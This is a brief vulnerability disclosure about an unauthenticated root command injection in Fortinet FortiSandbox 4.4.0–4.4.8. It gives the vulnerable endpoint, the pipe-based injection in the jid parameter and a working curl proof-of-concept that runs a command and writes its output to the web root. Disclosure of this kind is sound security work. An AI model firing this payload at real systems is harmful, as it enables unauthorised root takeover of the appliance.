On November 2025, a critical vulnerability was discovered on Fortinet's FortiSandbox which allowed an unauthenticated attacker to execute commands in the underlying OS as root. The vulnerability was patched and finally made public on April 2026.
This vulnerability affects FortiSandbox versions 4.4.0 through 4.4.8.
Read the full advisory here.
The vulnerability affects the /fortisandbox/job-detail/tracer-behavior endpoint. OS commands can be injected using the pipe symbol (|) on the jid GET parameter.
In the example above, output was redirected to a file in the web root, so that it can be retrieved afterwards.
A simple curl command is enough to achieve RCE as root with no previous authentication:
curl -s -k --get "http://$HOST/fortisandbox/job-detail/tracer-behavior" --data-urlencode "jid=|(id > /web/ng/out.txt)|"